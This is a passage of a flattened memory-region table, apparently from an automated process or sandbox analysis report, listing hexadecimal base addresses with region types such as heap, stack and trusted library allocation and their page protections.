trusted library allocation
|
page read and write
|
||
20B0EEE8000
|
trusted library allocation
|
page read and write
|
||
176F35BF000
|
heap
|
page read and write
|
||
176804A9000
|
trusted library allocation
|
page read and write
|
||
1FAE1990000
|
heap
|
page read and write
|
||
1FAE1ED1000
|
trusted library allocation
|
page read and write
|
||
1FAF2152000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A4000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE21EC000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E1000
|
trusted library allocation
|
page read and write
|
||
20B0D5F0000
|
trusted library allocation
|
page read and write
|
||
176F35C3000
|
heap
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
2B310257000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
5664BFF000
|
stack
|
page read and write
|
||
245011E2000
|
trusted library allocation
|
page read and write
|
||
1A8008A0000
|
heap
|
page execute and read and write
|
||
17680331000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
2451028B000
|
trusted library allocation
|
page read and write
|
||
2B3104B3000
|
trusted library allocation
|
page read and write
|
||
2451030A000
|
trusted library allocation
|
page read and write
|
||
1FAE2072000
|
trusted library allocation
|
page read and write
|
||
1FAE226C000
|
trusted library allocation
|
page read and write
|
||
245696CD000
|
heap
|
page read and write
|
||
176F3813000
|
heap
|
page read and write
|
||
245102F2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B77D000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
38FDDE1000
|
stack
|
page read and write
|
||
7FFD9BA19000
|
trusted library allocation
|
page read and write
|
||
20B1F0E2000
|
trusted library allocation
|
page read and write
|
||
1A866350000
|
trusted library allocation
|
page read and write
|
||
2B3287B1000
|
heap
|
page read and write
|
||
17680142000
|
trusted library allocation
|
page read and write
|
||
2B310399000
|
trusted library allocation
|
page read and write
|
||
2B30FFE9000
|
trusted library allocation
|
page read and write
|
||
2B3101BE000
|
trusted library allocation
|
page read and write
|
||
1A867C40000
|
heap
|
page execute and read and write
|
||
DDF1DFF000
|
stack
|
page read and write
|
||
2AE04EB0000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page execute and read and write
|
||
2B3288FB000
|
heap
|
page read and write
|
||
7FF40A820000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE1DFF000
|
trusted library allocation
|
page read and write
|
||
2AE067A0000
|
heap
|
page read and write
|
||
38827FE000
|
stack
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
1FADFEA6000
|
heap
|
page read and write
|
||
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
176F3704000
|
heap
|
page read and write
|
||
2B3289D0000
|
heap
|
page read and write
|
||
1FAE1E45000
|
trusted library allocation
|
page read and write
|
||
1A878032000
|
trusted library allocation
|
page read and write
|
||
176F3530000
|
trusted library section
|
page read and write
|
||
D3719B7000
|
stack
|
page read and write
|
||
176F0DC0000
|
unkown
|
page readonly
|
||
20B0D750000
|
heap
|
page execute and read and write
|
||
176F369F000
|
heap
|
page read and write
|
||
2B328A11000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
176F38A2000
|
heap
|
page read and write
|
||
1FAE2269000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C1000
|
trusted library allocation
|
page read and write
|
||
176804D2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
2B32890F000
|
heap
|
page read and write
|
||
1768011A000
|
trusted library allocation
|
page read and write
|
||
1FAF1D4C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B792000
|
trusted library allocation
|
page read and write
|
||
17680359000
|
trusted library allocation
|
page read and write
|
||
176F3907000
|
heap
|
page read and write
|
||
1FAF242C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
1FADFEBC000
|
heap
|
page read and write
|
||
2B328BD0000
|
heap
|
page read and write
|
||
17680597000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
2B328900000
|
heap
|
page read and write
|
||
20B0D63D000
|
heap
|
page read and write
|
||
2B310047000
|
trusted library allocation
|
page read and write
|
||
2B328BB0000
|
heap
|
page read and write
|
||
176801FD000
|
trusted library allocation
|
page read and write
|
||
176F3725000
|
heap
|
page read and write
|
||
DDF2DFF000
|
stack
|
page read and write
|
||
1A866228000
|
heap
|
page read and write
|
||
176F3519000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
176F397A000
|
heap
|
page read and write
|
||
1768059D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
24569550000
|
heap
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
A7E89FF000
|
stack
|
page read and write
|
||
17680402000
|
trusted library allocation
|
page read and write
|
||
7FFD9B934000
|
trusted library allocation
|
page read and write
|
||
2B30E290000
|
heap
|
page read and write
|
||
2B3287AF000
|
heap
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
1FAE1F85000
|
trusted library allocation
|
page read and write
|
||
2AE06790000
|
heap
|
page read and write
|
||
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
17680488000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
D37290B000
|
stack
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
56647E1000
|
stack
|
page read and write
|
||
2B31016C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
DDF29FC000
|
stack
|
page read and write
|
||
1FAE20E2000
|
trusted library allocation
|
page read and write
|
||
1FAF1AF1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B94E000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB3000
|
trusted library allocation
|
page read and write
|
||
2B328CAB000
|
heap
|
page read and write
|
||
D371BBD000
|
stack
|
page read and write
|
||
2AE04D35000
|
heap
|
page read and write
|
||
176F2CE0000
|
trusted library section
|
page read and write
|
||
245695ED000
|
heap
|
page read and write
|
||
7FFD9B9C6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9EA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
3881FFB000
|
stack
|
page read and write
|
||
2456859F000
|
heap
|
page read and write
|
||
1FAE01E5000
|
heap
|
page read and write
|
||
2B310180000
|
trusted library allocation
|
page read and write
|
||
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
176F10EA000
|
heap
|
page read and write
|
||
17680460000
|
trusted library allocation
|
page read and write
|
||
2AE04BE0000
|
heap
|
page read and write
|
||
388143E000
|
unkown
|
page read and write
|
||
7FFD9B9B1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9BF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE1F93000
|
trusted library allocation
|
page read and write
|
||
7DF426D90000
|
trusted library allocation
|
page execute and read and write
|
||
1FAFA383000
|
heap
|
page execute and read and write
|
||
2B328800000
|
heap
|
page read and write
|
||
4EC6FFC000
|
stack
|
page read and write
|
||
2B3287ED000
|
heap
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
2B30FF99000
|
trusted library allocation
|
page read and write
|
||
176F36C3000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
176F3853000
|
heap
|
page read and write
|
||
2B31025E000
|
trusted library allocation
|
page read and write
|
||
2AE07255000
|
heap
|
page read and write
|
||
1A867DFA000
|
trusted library allocation
|
page read and write
|
||
1FAE1FCB000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
1A867E47000
|
trusted library allocation
|
page read and write
|
||
17680194000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
1A867E74000
|
trusted library allocation
|
page read and write
|
||
176F3857000
|
heap
|
page read and write
|
||
2B310074000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B964000
|
trusted library allocation
|
page read and write
|
||
176F3750000
|
heap
|
page read and write
|
||
2B310096000
|
trusted library allocation
|
page read and write
|
||
2B30E4A0000
|
heap
|
page read and write
|
||
24568E91000
|
heap
|
page read and write
|
||
2B32063F000
|
trusted library allocation
|
page read and write
|
||
1768050F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
2AE04CF0000
|
heap
|
page read and write
|
||
DDF19E1000
|
stack
|
page read and write
|
||
24568D20000
|
heap
|
page read and write
|
||
1FAE2240000
|
trusted library allocation
|
page read and write
|
||
24568D25000
|
heap
|
page read and write
|
||
176805E1000
|
trusted library allocation
|
page read and write
|
||
176F3757000
|
heap
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA0B000
|
trusted library allocation
|
page read and write
|
||
38813FF000
|
stack
|
page read and write
|
||
176F1067000
|
heap
|
page read and write
|
||
1FAF1E03000
|
trusted library allocation
|
page read and write
|
||
D3715FE000
|
stack
|
page read and write
|
||
1FAE1EED000
|
trusted library allocation
|
page read and write
|
||
1FADFEE9000
|
heap
|
page read and write
|
||
1FAF1BFA000
|
trusted library allocation
|
page read and write
|
||
DE0F3FF000
|
stack
|
page read and write
|
||
7FFD9B9D6000
|
trusted library allocation
|
page read and write
|
||
388183E000
|
stack
|
page read and write
|
||
20B26E50000
|
trusted library allocation
|
page read and write
|
||
2B3103AD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A6000
|
trusted library allocation
|
page read and write
|
||
1FAE1EA7000
|
trusted library allocation
|
page read and write
|
||
2B3288D0000
|
heap
|
page read and write
|
||
245696F5000
|
heap
|
page read and write
|
||
176F3923000
|
heap
|
page read and write
|
||
176F10A3000
|
heap
|
page read and write
|
||
2B3288D4000
|
heap
|
page read and write
|
||
7FFD9B79A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
2450186F000
|
trusted library allocation
|
page read and write
|
||
1FAE1FEB000
|
trusted library allocation
|
page read and write
|
||
1768053A000
|
trusted library allocation
|
page read and write
|
||
1FAF1D99000
|
trusted library allocation
|
page read and write
|
||
2B3102C7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B978000
|
trusted library allocation
|
page read and write
|
||
7FFD9B998000
|
trusted library allocation
|
page read and write
|
||
1A867D40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
1A867E33000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
1FAF1E3B000
|
trusted library allocation
|
page read and write
|
||
7FFD9B846000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
1FAE2198000
|
trusted library allocation
|
page read and write
|
||
1FADFE68000
|
heap
|
page read and write
|
||
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE2128000
|
trusted library allocation
|
page read and write
|
||
1FADFEE4000
|
heap
|
page read and write
|
||
1FAE222C000
|
trusted library allocation
|
page read and write
|
||
245693DE000
|
heap
|
page read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
176F34A4000
|
heap
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
1FAE00B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
2B30E296000
|
heap
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C6000
|
trusted library allocation
|
page read and write
|
||
2B328A89000
|
heap
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
1FAE0110000
|
heap
|
page read and write
|
||
1FAE203A000
|
trusted library allocation
|
page read and write
|
||
1FAE225C000
|
trusted library allocation
|
page read and write
|
||
DDF31FE000
|
stack
|
page read and write
|
||
1768054D000
|
trusted library allocation
|
page read and write
|
||
2B30E680000
|
heap
|
page read and write
|
||
D37280E000
|
stack
|
page read and write
|
||
1FAF252D000
|
trusted library allocation
|
page read and write
|
||
176F3476000
|
heap
|
page read and write
|
||
176907FF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B82C000
|
trusted library allocation
|
page execute and read and write
|
||
1A86625C000
|
heap
|
page read and write
|
||
1FAE20B8000
|
trusted library allocation
|
page read and write
|
||
24500D85000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
1FAF22A4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7AD000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
1FAE1D4F000
|
trusted library allocation
|
page read and write
|
||
176F3717000
|
heap
|
page read and write
|
||
1FAE221C000
|
trusted library allocation
|
page read and write
|
||
1FAFA390000
|
heap
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE1EB5000
|
trusted library allocation
|
page read and write
|
||
2B328809000
|
heap
|
page read and write
|
||
1A867E88000
|
trusted library allocation
|
page read and write
|
||
2B320312000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
1FAE20D4000
|
trusted library allocation
|
page read and write
|
||
24569322000
|
heap
|
page read and write
|
||
2B31027F000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
2B31013D000
|
trusted library allocation
|
page read and write
|
||
176F3779000
|
heap
|
page read and write
|
||
1FAFA670000
|
heap
|
page read and write
|
||
245010C5000
|
trusted library allocation
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B6000
|
trusted library allocation
|
page read and write
|
||
1A8661A0000
|
heap
|
page read and write
|
||
1A8663A5000
|
heap
|
page read and write
|
||
176F37E1000
|
heap
|
page read and write
|
||
2AE04CC0000
|
heap
|
page read and write
|
||
7FFD9B79A000
|
trusted library allocation
|
page read and write
|
||
1FAF1DCF000
|
trusted library allocation
|
page read and write
|
||
2450022A000
|
trusted library allocation
|
page read and write
|
||
7FFD9B937000
|
trusted library allocation
|
page read and write
|
||
2B3102B9000
|
trusted library allocation
|
page read and write
|
||
2B328B98000
|
heap
|
page read and write
|
||
176F35AF000
|
heap
|
page read and write
|
||
4EC5FE1000
|
stack
|
page read and write
|
||
1FAE1D1F000
|
trusted library allocation
|
page read and write
|
||
2B31014A000
|
trusted library allocation
|
page read and write
|
||
1FAE216E000
|
trusted library allocation
|
page read and write
|
||
2B328770000
|
heap
|
page execute and read and write
|
||
20B0D1F0000
|
heap
|
page read and write
|
||
2450138E000
|
trusted library allocation
|
page read and write
|
||
176F3894000
|
heap
|
page read and write
|
||
2B3102E3000
|
trusted library allocation
|
page read and write
|
||
7FFD9B79D000
|
trusted library allocation
|
page execute and read and write
|
||
2B310414000
|
trusted library allocation
|
page read and write
|
||
1FAE224E000
|
trusted library allocation
|
page read and write
|
||
7DF426D80000
|
trusted library allocation
|
page execute and read and write
|
||
20B0D287000
|
heap
|
page read and write
|
||
7FFD9B9B8000
|
trusted library allocation
|
page read and write
|
||
2AE04EA9000
|
heap
|
page read and write
|
||
1A867D20000
|
heap
|
page read and write
|
||
4EC73FE000
|
stack
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B810000
|
trusted library allocation
|
page read and write
|
||
38FF1FE000
|
stack
|
page read and write
|
||
2B328BA0000
|
heap
|
page read and write
|
||
1FAE1FBD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
1FAFA3EE000
|
heap
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
1FADFEAC000
|
heap
|
page read and write
|
||
1A8661C0000
|
heap
|
page read and write
|
||
17680522000
|
trusted library allocation
|
page read and write
|
||
A7E95FE000
|
stack
|
page read and write
|
||
24568DE0000
|
heap
|
page execute and read and write
|
||
DE0F5FE000
|
stack
|
page read and write
|
||
A7E8DFE000
|
stack
|
page read and write
|
||
1FAE210C000
|
trusted library allocation
|
page read and write
|
||
176F36CE000
|
heap
|
page read and write
|
||
7FFD9BA24000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
1FAE20FD000
|
trusted library allocation
|
page read and write
|
||
2B31FF36000
|
trusted library allocation
|
page read and write
|
||
2B320192000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
DDF21FE000
|
stack
|
page read and write
|
||
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
2B32884A000
|
heap
|
page read and write
|
||
DDF35FE000
|
stack
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page read and write
|
||
2B320617000
|
trusted library allocation
|
page read and write
|
||
1FAFA3F0000
|
heap
|
page read and write
|
||
176F101C000
|
heap
|
page read and write
|
||
DE0F6FE000
|
stack
|
page read and write
|
||
2B31034E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
245696D1000
|
heap
|
page read and write
|
||
1A8663C5000
|
heap
|
page read and write
|
||
1FAE0090000
|
heap
|
page read and write
|
||
7FFD9B988000
|
trusted library allocation
|
page read and write
|
||
1FAE1EFB000
|
trusted library allocation
|
page read and write
|
||
176F37BB000
|
heap
|
page read and write
|
||
2AE06740000
|
heap
|
page read and write
|
||
2B328C79000
|
heap
|
page read and write
|
||
D3718BF000
|
stack
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page execute and read and write
|
||
2AE04E14000
|
heap
|
page read and write
|
||
1FAE1C50000
|
trusted library allocation
|
page read and write
|
||
176F38AD000
|
heap
|
page read and write
|
||
176802AA000
|
trusted library allocation
|
page read and write
|
||
176801B4000
|
trusted library allocation
|
page read and write
|
||
7FFD9B7BC000
|
trusted library allocation
|
page execute and read and write
|
||
245696C4000
|
heap
|
page read and write
|
||
2B32887D000
|
heap
|
page read and write
|
||
1FAE1EDF000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B93E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
2B3287A0000
|
heap
|
page read and write
|
||
176803CB000
|
trusted library allocation
|
page read and write
|
||
2B30E595000
|
heap
|
page read and write
|
||
1768022E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
2B30E2FB000
|
heap
|
page read and write
|
||
2456969D000
|
heap
|
page read and write
|
||
7FFD9B930000
|
trusted library allocation
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
24568E40000
|
trusted library allocation
|
page read and write
|
||
7FFD9B998000
|
trusted library allocation
|
page read and write
|
||
245685A7000
|
heap
|
page read and write
|
||
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
24568860000
|
trusted library section
|
page read and write
|
||
245685A9000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
D371C3F000
|
stack
|
page read and write
|
||
24501044000
|
trusted library allocation
|
page read and write
|
||
2B328A82000
|
heap
|
page read and write
|
||
20B27620000
|
heap
|
page execute and read and write
|
||
1FAE1C48000
|
trusted library allocation
|
page read and write
|
||
24568875000
|
heap
|
page read and write
|
||
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
1FAF2000000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B6000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
D37288C000
|
stack
|
page read and write
|
||
2450178A000
|
trusted library allocation
|
page read and write
|
||
245695D6000
|
heap
|
page read and write
|
||
2B30E2CF000
|
heap
|
page read and write
|
||
176F107A000
|
heap
|
page read and write
|
||
2B30E4E0000
|
trusted library allocation
|
page read and write
|
||
1FAFA6AB000
|
heap
|
page read and write
|
||
24510031000
|
trusted library allocation
|
page read and write
|
||
3882BF7000
|
stack
|
page read and write
|
||
24501957000
|
trusted library allocation
|
page read and write
|
||
24568750000
|
heap
|
page read and write
|
||
2B30E6E5000
|
heap
|
page read and write
|
||
1FAF2334000
|
trusted library allocation
|
page read and write
|
||
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
2B32880D000
|
heap
|
page read and write
|
||
7FFD9B9C8000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
245013CC000
|
trusted library allocation
|
page read and write
|
||
2B328C91000
|
heap
|
page read and write
|
||
17680408000
|
trusted library allocation
|
page read and write
|
||
2B328A18000
|
heap
|
page read and write
|
||
17680204000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C4000
|
trusted library allocation
|
page read and write
|
||
1FAE1F5B000
|
trusted library allocation
|
page read and write
|
||
17680156000
|
trusted library allocation
|
page read and write
|
||
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
176F2D60000
|
heap
|
page execute and read and write
|
||
1FAF2381000
|
trusted library allocation
|
page read and write
|
||
1A8784DF000
|
trusted library allocation
|
page read and write
|
||
1FAE1CE9000
|
trusted library allocation
|
page read and write
|
||
2B328CAF000
|
heap
|
page read and write
|
||
17680466000
|
trusted library allocation
|
page read and write
|
||
7FFD9B964000
|
trusted library allocation
|
page read and write
|
||
1FAE1FE7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
2B328773000
|
heap
|
page execute and read and write
|
||
1768049C000
|
trusted library allocation
|
page read and write
|
||
1FADFE7B000
|
heap
|
page read and write
|
||
24569482000
|
heap
|
page read and write
|
||
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B8000
|
trusted library allocation
|
page read and write
|
||
1FAF1CF8000
|
trusted library allocation
|
page read and write
|
||
176F396B000
|
heap
|
page read and write
|
||
176F343C000
|
heap
|
page read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
1FAE1D6B000
|
trusted library allocation
|
page read and write
|
||
176F371F000
|
heap
|
page read and write
|
||
17680481000
|
trusted library allocation
|
page read and write
|
||
2B30FFCE000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
24500A54000
|
trusted library allocation
|
page read and write
|
||
176F3494000
|
heap
|
page read and write
|
||
2B3289FE000
|
heap
|
page read and write
|
||
2B3206FD000
|
trusted library allocation
|
page read and write
|
||
176F345E000
|
heap
|
page read and write
|
||
A7E91FD000
|
stack
|
page read and write
|
||
1FAE1F25000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
D371679000
|
stack
|
page read and write
|
||
1A8663A0000
|
heap
|
page read and write
|
||
176F359D000
|
heap
|
page read and write
|
||
3880BFE000
|
stack
|
page read and write
|
||
2B3104A0000
|
trusted library allocation
|
page read and write
|
||
176F386D000
|
heap
|
page read and write
|
||
1FAE0050000
|
heap
|
page read and write
|
||
1FADFF57000
|
heap
|
page read and write
|
||
7FFD9B781000
|
trusted library allocation
|
page read and write
|
||
1FAE1FF5000
|
trusted library allocation
|
page read and write
|
||
176F1190000
|
trusted library allocation
|
page read and write
|
||
2B31FE91000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A8000
|
trusted library allocation
|
page read and write
|
||
17680602000
|
trusted library allocation
|
page read and write
|
||
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76D000
|
trusted library allocation
|
page execute and read and write
|
||
24569654000
|
heap
|
page read and write
|
||
2AE04D70000
|
direct allocation
|
page execute and read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
2AE06798000
|
heap
|
page read and write
|
||
2B320034000
|
trusted library allocation
|
page read and write
|
||
2B328FF0000
|
heap
|
page execute and read and write
|
||
176F1280000
|
heap
|
page read and write
|
||
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
7FFD9B94C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9AD000
|
trusted library allocation
|
page read and write
|
||
20B0D800000
|
heap
|
page read and write
|
||
7FFD9B890000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE2251000
|
trusted library allocation
|
page read and write
|
||
56657FD000
|
stack
|
page read and write
|
||
7FFD9BA12000
|
trusted library allocation
|
page read and write
|
||
17680284000
|
trusted library allocation
|
page read and write
|
||
2B30FFBA000
|
trusted library allocation
|
page read and write
|
||
7FFD9B935000
|
trusted library allocation
|
page read and write
|
||
4EC67FE000
|
stack
|
page read and write
|
||
24501129000
|
trusted library allocation
|
page read and write
|
||
176F3748000
|
heap
|
page read and write
|
||
176F3930000
|
heap
|
page read and write
|
||
1FAE1E99000
|
trusted library allocation
|
page read and write
|
||
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
1FAF1BA6000
|
trusted library allocation
|
page read and write
|
||
2B32074D000
|
trusted library allocation
|
page read and write
|
||
7FFD9B78B000
|
trusted library allocation
|
page execute and read and write
|
||
1FAE208E000
|
trusted library allocation
|
page read and write
|
||
7FFD9B974000
|
trusted library allocation
|
page read and write
|
||
1A877FDA000
|
trusted library allocation
|
page read and write
|
||
2B3102D6000
|
trusted library allocation
|
page read and write
|
||
2B328B0B000
|
heap
|
page read and write
|
||
17680186000
|
trusted library allocation
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
20B1F0C2000
|
trusted library allocation
|
page read and write
|
||
7FFD9B762000
|
trusted library allocation
|
page read and write
|
||
1FAE1E6F000
|
trusted library allocation
|
page read and write
|
||
2B3287F9000
|
heap
|
page read and write
|
||
2B30E460000
|
heap
|
page read and write
|
||
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
2B30E2BA000
|
heap
|
page read and write
|
||
38FFE37000
|
stack
|
page read and write
|
||
2B328BFB000
|
heap
|
page read and write
|
||
176F34AF000
|
heap
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
2B328BE2000
|
heap
|
page read and write
|
||
1FAE21A6000
|
trusted library allocation
|
page read and write
|
||
D372789000
|
stack
|
page read and write
|
||
176805DA000
|
trusted library allocation
|
page read and write
|
||
2B30E2B2000
|
heap
|
page read and write
|
||
2B310124000
|
trusted library allocation
|
page read and write
|
||
1FAE1F09000
|
trusted library allocation
|
page read and write
|
||
1FAE1F37000
|
trusted library allocation
|
page read and write
|
||
1A8663C0000
|
heap
|
page read and write
|
||
2456862A000
|
heap
|
page read and write
|
||
1FAE1DF8000
|
trusted library allocation
|
page read and write
|
||
2AE0A455000
|
heap
|
page read and write
|
||
176F0FD0000
|
heap
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
176801A7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
1FAE21B3000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAF0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B957000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9C8000
|
trusted library allocation
|
page read and write
|
||
1A866285000
|
heap
|
page read and write
|
||
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
24568E10000
|
heap
|
page execute and read and write
|
||
1768031E000
|
trusted library allocation
|
page read and write
|
||
2B3102AC000
|
trusted library allocation
|
page read and write
|
||
1A877ED4000
|
trusted library allocation
|
page read and write
|
||
140784000
|
remote allocation
|
page execute and read and write
|
||
D3716FE000
|
stack
|
page read and write
|
||
1FAE21DD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9BD000
|
trusted library allocation
|
page read and write
|
||
7FFD9B93B000
|
trusted library allocation
|
page read and write
|
||
176F3880000
|
heap
|
page read and write
|
||
1A867DF8000
|
trusted library allocation
|
page read and write
|
||
1FAF22F8000
|
trusted library allocation
|
page read and write
|
||
1A86623F000
|
heap
|
page read and write
|
||
2B310478000
|
trusted library allocation
|
page read and write
|
||
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
D3717FD000
|
stack
|
page read and write
|
||
24501E28000
|
trusted library allocation
